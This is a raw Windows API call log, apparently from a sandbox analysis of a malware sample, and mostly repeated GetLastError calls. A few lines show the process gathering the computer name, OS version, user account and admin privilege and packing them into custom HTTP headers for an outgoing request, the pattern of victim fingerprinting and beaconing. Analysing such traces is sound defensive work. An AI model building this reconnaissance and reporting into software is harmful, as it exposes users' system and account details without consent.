	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.081] GetLastError () returned 0x0
	[0123.081] GetLastError () returned 0x0
	[0123.081] GetLastError () returned 0x0
	[0123.081] GetLastError () returned 0x0
	[0123.081] GetLastError () returned 0x0
	[0123.081] GetLastError () returned 0x0
	[0123.081] GetLastError () returned 0x0
	[0123.081] GetLastError () returned 0x0
	[0123.081] GetLastError () returned 0x0
	[0123.081] GetLastError () returned 0x0
	[0123.081] GetLastError () returned 0x0
	[0123.081] GetLastError () returned 0x0
	[0123.081] GetLastError () returned 0x0
	[0123.081] GetLastError () returned 0x0
	[0123.081] GetLastError () returned 0x0
	[0123.081] GetLastError () returned 0x0
	[0123.081] GetLastError () returned 0x0
	[0123.081] GetLastError () returned 0x0
	[0123.081] GetLastError () returned 0x0
	[0123.081] GetLastError () returned 0x0
	[0123.081] GetLastError () returned 0x0
	[0123.081] GetLastError () returned 0x0
	[0123.081] GetLastError () returned 0x0
	[0123.081] GetLastError () returned 0x0
	[0123.081] GetLastError () returned 0x0
	[0123.081] GetLastError () returned 0x0
	[0123.081] GetLastError () returned 0x0
	[0123.081] GetLastError () returned 0x0
	[0123.081] GetLastError () returned 0x0
	[0123.081] GetLastError () returned 0x0
	[0123.081] GetLastError () returned 0x0
	[0123.081] GetLastError () returned 0x0
	[0123.081] GetLastError () returned 0x0
	[0123.081] GetLastError () returned 0x0
	[0123.081] GetLastError () returned 0x0
	[0123.081] GetLastError () returned 0x0
	[0123.082] GetLastError () returned 0x0
	[0123.082] GetLastError () returned 0x0
	[0123.082] GetLastError () returned 0x0
	[0123.082] GetLastError () returned 0x0
	[0123.082] GetLastError () returned 0x0
	[0123.082] GetLastError () returned 0x0
	[0123.082] GetLastError () returned 0x0
	[0123.082] GetLastError () returned 0x0
	[0123.082] GetLastError () returned 0x0
	[0123.082] GetLastError () returned 0x0
	[0123.082] GetLastError () returned 0x0
	[0123.082] GetLastError () returned 0x0
	[0123.082] GetLastError () returned 0x0
	[0123.082] GetLastError () returned 0x0
	[0123.082] GetLastError () returned 0x0
	[0123.082] GetLastError () returned 0x0
	[0123.082] GetLastError () returned 0x0
	[0123.082] GetLastError () returned 0x0
	[0123.082] GetLastError () returned 0x0
	[0123.082] GetLastError () returned 0x0
	[0123.082] GetLastError () returned 0x0
	[0123.082] GetLastError () returned 0x0
	[0123.082] GetLastError () returned 0x0
	[0123.082] GetLastError () returned 0x0
	[0123.082] GetLastError () returned 0x0
	[0123.082] GetLastError () returned 0x0
	[0123.082] GetLastError () returned 0x0
	[0123.082] GetLastError () returned 0x0
	[0123.082] GetLastError () returned 0x0
	[0123.082] GetLastError () returned 0x0
	[0123.082] GetLastError () returned 0x0
	[0123.082] GetLastError () returned 0x0
	[0123.082] GetLastError () returned 0x0
	[0123.082] GetLastError () returned 0x0
	[0123.082] GetLastError () returned 0x0
	[0123.082] GetLastError () returned 0x0
	[0123.082] GetLastError () returned 0x0
	[0123.082] GetLastError () returned 0x0
	[0123.082] GetLastError () returned 0x0
	[0123.082] GetLastError () returned 0x0
	[0123.082] GetLastError () returned 0x0
	[0123.082] GetLastError () returned 0x0
	[0123.082] GetLastError () returned 0x0
	[0123.082] GetLastError () returned 0x0
	[0123.082] GetLastError () returned 0x0
	[0123.082] GetLastError () returned 0x0
	[0123.082] GetLastError () returned 0x0
	[0123.082] GetComputerNameW (in: lpBuffer=0x689390, nSize=0x205f400 | out: lpBuffer="X2VS1CUM", nSize=0x205f400) returned 1
	[0123.082] GetLastError () returned 0xcb
	[0123.082] GetLastError () returned 0xcb
	[0123.082] GetLastError () returned 0xcb
	[0123.082] GetLastError () returned 0xcb
	[0123.082] GetLastError () returned 0xcb
	[0123.082] GetLastError () returned 0xcb
	[0123.082] GetLastError () returned 0xcb
	[0123.082] GetLastError () returned 0xcb
	[0123.082] GetLastError () returned 0xcb
	[0123.082] GetLastError () returned 0xcb
	[0123.082] GetLastError () returned 0xcb
	[0123.082] GetLastError () returned 0xcb
	[0123.082] GetLastError () returned 0xcb
	[0123.082] GetLastError () returned 0xcb
	[0123.082] GetLastError () returned 0xcb
	[0123.082] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] GetLastError () returned 0xcb
	[0123.083] wsprintfW (in: param_1=0x396d0f0, param_2="X-ComputerName: %s" | out: param_1="X-ComputerName: X2VS1CUM") returned 24
	[0123.083] lstrlenW (lpString="X-ComputerName: X2VS1CUM") returned 24
	[0123.083] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-ComputerName: X2VS1CUM", dwHeadersLength=0x18, dwModifiers=0x10000000) returned 1
	[0123.083] GetVersionExW (in: lpVersionInformation=0x205f2e4*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x205f2e4*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.084] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.085] GetLastError () returned 0x0
	[0123.086] GetLastError () returned 0x0
	[0123.086] GetLastError () returned 0x0
	[0123.086] GetLastError () returned 0x0
	[0123.086] GetLastError () returned 0x0
	[0123.086] GetLastError () returned 0x0
	[0123.086] GetLastError () returned 0x0
	[0123.086] GetLastError () returned 0x0
	[0123.086] GetLastError () returned 0x0
	[0123.086] GetLastError () returned 0x0
	[0123.086] GetLastError () returned 0x0
	[0123.086] GetLastError () returned 0x0
	[0123.086] GetLastError () returned 0x0
	[0123.086] GetLastError () returned 0x0
	[0123.086] GetLastError () returned 0x0
	[0123.086] GetLastError () returned 0x0
	[0123.086] GetLastError () returned 0x0
	[0123.086] GetLastError () returned 0x0
	[0123.086] GetLastError () returned 0x0
	[0123.086] GetLastError () returned 0x0
	[0123.086] GetLastError () returned 0x0
	[0123.086] GetLastError () returned 0x0
	[0123.086] GetLastError () returned 0x0
	[0123.086] GetLastError () returned 0x0
	[0123.086] GetLastError () returned 0x0
	[0123.086] wsprintfW (in: param_1=0x396d0f0, param_2="X-OSVersion: %d.%d.%d|%s %d.%d|%d|0x%p" | out: param_1="X-OSVersion: 6.2.9200| 0.0|1|0x00000100") returned 39
	[0123.086] lstrlenW (lpString="X-OSVersion: 6.2.9200| 0.0|1|0x00000100") returned 39
	[0123.086] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-OSVersion: 6.2.9200| 0.0|1|0x00000100", dwHeadersLength=0x27, dwModifiers=0x10000000) returned 1
	[0123.086] GetLastError () returned 0x0
	[0123.086] GetLastError () returned 0x0
	[0123.086] GetLastError () returned 0x0
	[0123.086] GetLastError () returned 0x0
	[0123.086] GetLastError () returned 0x0
	[0123.086] GetLastError () returned 0x0
	[0123.086] GetLastError () returned 0x0
	[0123.086] GetLastError () returned 0x0
	[0123.086] GetLastError () returned 0x0
	[0123.086] GetLastError () returned 0x0
	[0123.086] GetLastError () returned 0x0
	[0123.086] GetLastError () returned 0x0
	[0123.086] GetLastError () returned 0x0
	[0123.086] GetLastError () returned 0x0
	[0123.086] GetLastError () returned 0x0
	[0123.086] GetLastError () returned 0x0
	[0123.086] GetLastError () returned 0x0
	[0123.086] GetLastError () returned 0x0
	[0123.086] wsprintfW (in: param_1=0x396d0f0, param_2="X-VendorId: %d" | out: param_1="X-VendorId: 3007") returned 16
	[0123.086] lstrlenW (lpString="X-VendorId: 3007") returned 16
	[0123.086] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-VendorId: 3007", dwHeadersLength=0x10, dwModifiers=0x10000000) returned 1
	[0123.086] GetCurrentProcess () returned 0xffffffff
	[0123.086] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x205f2c4 | out: TokenHandle=0x205f2c4*=0x69c) returned 1
	[0123.086] GetTokenInformation (in: TokenHandle=0x69c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x205f2a0 | out: TokenInformation=0x0, ReturnLength=0x205f2a0) returned 0
	[0123.086] GetLastError () returned 0x7a
	[0123.087] GetTokenInformation (in: TokenHandle=0x69c, TokenInformationClass=0x1, TokenInformation=0x392ad98, TokenInformationLength=0x24, ReturnLength=0x205f2a0 | out: TokenInformation=0x392ad98, ReturnLength=0x205f2a0) returned 1
	[0123.087] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x392ada0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2e)), Name=0x698ee8, cchName=0x205f294, ReferencedDomainName=0x699708, cchReferencedDomainName=0x205f294, peUse=0x205f288 | out: Name="Nd9E1FYi", cchName=0x205f294, ReferencedDomainName="X2VS1CUM", cchReferencedDomainName=0x205f294, peUse=0x205f288) returned 1
	[0123.087] CloseHandle (hObject=0x69c) returned 1
	[0123.087] CloseHandle (hObject=0xffffffff) returned 1
	[0123.087] NetUserGetInfo (in: servername="X2VS1CUM", username="Nd9E1FYi", level=0x3, bufptr=0x205f2c4 | out: bufptr=0x39abb80*(usri3_name="Nd9E1FYi", usri3_password=0x0, usri3_password_age=0x186772d, usri3_priv=0x2, usri3_home_dir="", usri3_comment="", usri3_flags=0x10201, usri3_script_path="", usri3_auth_flags=0x0, usri3_full_name="", usri3_usr_comment="", usri3_parms="", usri3_workstations="", usri3_last_logon=0x5bbf6dd7, usri3_last_logoff=0x0, usri3_acct_expires=0xffffffff, usri3_max_storage=0xffffffff, usri3_units_per_week=0xa8, usri3_logon_hours=0x39abc17, usri3_bad_pw_count=0x0, usri3_num_logons=0x34, usri3_logon_server="\\\\*", usri3_country_code=0x1, usri3_code_page=0x4e4, usri3_user_id=0x3e8, usri3_primary_group_id=0x201, usri3_profile="", usri3_home_dir_drive="", usri3_password_expired=0x0)) returned 0x0
	[0123.090] GetLastError () returned 0x0
	[0123.090] GetLastError () returned 0x0
	[0123.090] GetLastError () returned 0x0
	[0123.090] GetLastError () returned 0x0
	[0123.090] GetLastError () returned 0x0
	[0123.090] GetLastError () returned 0x0
	[0123.090] GetLastError () returned 0x0
	[0123.090] GetLastError () returned 0x0
	[0123.090] GetLastError () returned 0x0
	[0123.090] GetLastError () returned 0x0
	[0123.090] GetLastError () returned 0x0
	[0123.090] GetLastError () returned 0x0
	[0123.090] GetLastError () returned 0x0
	[0123.091] GetLastError () returned 0x0
	[0123.091] GetLastError () returned 0x0
	[0123.091] GetLastError () returned 0x0
	[0123.091] GetLastError () returned 0x0
	[0123.091] GetLastError () returned 0x0
	[0123.091] GetLastError () returned 0x0
	[0123.091] GetLastError () returned 0x0
	[0123.091] GetLastError () returned 0x0
	[0123.091] GetLastError () returned 0x0
	[0123.091] GetLastError () returned 0x0
	[0123.091] GetLastError () returned 0x0
	[0123.091] GetLastError () returned 0x0
	[0123.091] GetLastError () returned 0x0
	[0123.091] GetLastError () returned 0x0
	[0123.091] GetLastError () returned 0x0
	[0123.091] GetLastError () returned 0x0
	[0123.091] GetLastError () returned 0x0
	[0123.091] GetLastError () returned 0x0
	[0123.091] GetLastError () returned 0x0
	[0123.091] GetLastError () returned 0x0
	[0123.091] GetLastError () returned 0x0
	[0123.091] GetLastError () returned 0x0
	[0123.091] GetLastError () returned 0x0
	[0123.091] GetLastError () returned 0x0
	[0123.091] GetLastError () returned 0x0
	[0123.091] GetLastError () returned 0x0
	[0123.091] GetLastError () returned 0x0
	[0123.091] GetLastError () returned 0x0
	[0123.091] GetLastError () returned 0x0
	[0123.091] GetLastError () returned 0x0
	[0123.091] GetLastError () returned 0x0
	[0123.091] GetLastError () returned 0x0
	[0123.091] GetLastError () returned 0x0
	[0123.091] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.092] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.093] GetLastError () returned 0x0
	[0123.094] GetLastError () returned 0x0
	[0123.094] GetLastError () returned 0x0
	[0123.094] GetLastError () returned 0x0
	[0123.094] GetLastError () returned 0x0
	[0123.094] GetLastError () returned 0x0
	[0123.094] GetLastError () returned 0x0
	[0123.094] GetLastError () returned 0x0
	[0123.102] GetLastError () returned 0x0
	[0123.102] GetLastError () returned 0x0
	[0123.102] GetLastError () returned 0x0
	[0123.102] GetLastError () returned 0x0
	[0123.102] GetLastError () returned 0x0
	[0123.102] GetLastError () returned 0x0
	[0123.102] GetLastError () returned 0x0
	[0123.102] GetLastError () returned 0x0
	[0123.102] GetLastError () returned 0x0
	[0123.102] GetLastError () returned 0x0
	[0123.102] GetLastError () returned 0x0
	[0123.102] GetLastError () returned 0x0
	[0123.102] GetLastError () returned 0x0
	[0123.102] GetLastError () returned 0x0
	[0123.102] GetLastError () returned 0x0
	[0123.102] GetLastError () returned 0x0
	[0123.102] GetLastError () returned 0x0
	[0123.102] GetLastError () returned 0x0
	[0123.102] GetLastError () returned 0x0
	[0123.102] GetLastError () returned 0x0
	[0123.102] GetLastError () returned 0x0
	[0123.102] GetLastError () returned 0x0
	[0123.103] GetLastError () returned 0x0
	[0123.103] GetLastError () returned 0x0
	[0123.103] GetLastError () returned 0x0
	[0123.103] GetLastError () returned 0x0
	[0123.103] GetLastError () returned 0x0
	[0123.103] GetLastError () returned 0x0
	[0123.103] GetLastError () returned 0x0
	[0123.103] GetLastError () returned 0x0
	[0123.103] GetLastError () returned 0x0
	[0123.103] GetLastError () returned 0x0
	[0123.103] GetLastError () returned 0x0
	[0123.103] GetLastError () returned 0x0
	[0123.103] GetLastError () returned 0x0
	[0123.103] GetLastError () returned 0x0
	[0123.103] GetLastError () returned 0x0
	[0123.103] GetLastError () returned 0x0
	[0123.103] GetLastError () returned 0x0
	[0123.103] GetLastError () returned 0x0
	[0123.103] GetLastError () returned 0x0
	[0123.103] GetLastError () returned 0x0
	[0123.103] GetLastError () returned 0x0
	[0123.103] GetLastError () returned 0x0
	[0123.103] GetLastError () returned 0x0
	[0123.103] GetLastError () returned 0x0
	[0123.103] GetLastError () returned 0x0
	[0123.103] GetLastError () returned 0x0
	[0123.103] GetLastError () returned 0x0
	[0123.103] GetLastError () returned 0x0
	[0123.103] GetLastError () returned 0x0
	[0123.103] GetLastError () returned 0x0
	[0123.103] GetLastError () returned 0x0
	[0123.103] GetLastError () returned 0x0
	[0123.103] GetLastError () returned 0x0
	[0123.103] GetLastError () returned 0x0
	[0123.103] GetLastError () returned 0x0
	[0123.103] GetLastError () returned 0x0
	[0123.103] GetLastError () returned 0x0
	[0123.103] GetLastError () returned 0x0
	[0123.103] GetLastError () returned 0x0
	[0123.103] GetLastError () returned 0x0
	[0123.103] GetLastError () returned 0x0
	[0123.103] GetLastError () returned 0x0
	[0123.103] GetLastError () returned 0x0
	[0123.103] GetLastError () returned 0x0
	[0123.103] GetLastError () returned 0x0
	[0123.103] GetLastError () returned 0x0
	[0123.103] GetLastError () returned 0x0
	[0123.103] GetLastError () returned 0x0
	[0123.103] GetLastError () returned 0x0
	[0123.103] GetLastError () returned 0x0
	[0123.104] GetLastError () returned 0x0
	[0123.104] GetLastError () returned 0x0
	[0123.104] GetLastError () returned 0x0
	[0123.104] GetLastError () returned 0x0
	[0123.104] GetLastError () returned 0x0
	[0123.104] GetLastError () returned 0x0
	[0123.104] wsprintfW (in: param_1=0x396d0f0, param_2="X-User-Info: %ws|%ws|0x%p|0x%p|%ws|%ws" | out: param_1="X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\\\*") returned 62
	[0123.104] lstrlenW (lpString="X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\\\*") returned 62
	[0123.104] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\\\*", dwHeadersLength=0x3e, dwModifiers=0x10000000) returned 1
	[0123.104] NetApiBufferFree (Buffer=0x39abb80) returned 0x0
	[0123.104] GetLastError () returned 0x0
	[0123.104] GetLastError () returned 0x0
	[0123.104] GetLastError () returned 0x0
	[0123.104] GetLastError () returned 0x0
	[0123.104] GetLastError () returned 0x0
	[0123.104] GetLastError () returned 0x0
	[0123.104] GetLastError () returned 0x0
	[0123.104] GetLastError () returned 0x0
	[0123.104] GetLastError () returned 0x0
